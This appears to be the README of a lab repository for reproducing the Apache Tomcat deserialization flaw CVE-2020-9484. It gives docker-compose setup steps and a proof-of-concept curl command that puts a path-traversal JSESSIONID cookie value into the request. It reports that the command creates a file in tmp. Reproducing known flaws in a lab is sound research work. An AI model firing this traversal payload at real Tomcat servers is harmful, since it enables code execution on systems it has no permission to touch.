Apache Tomcat Deserialization Vulnerability (CVE-2020-9484) Vulnerable target setup Clone this repository Run docker-compose up -d That's it ! Exploit POC Run curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx File named coldfx gets created in tmp directory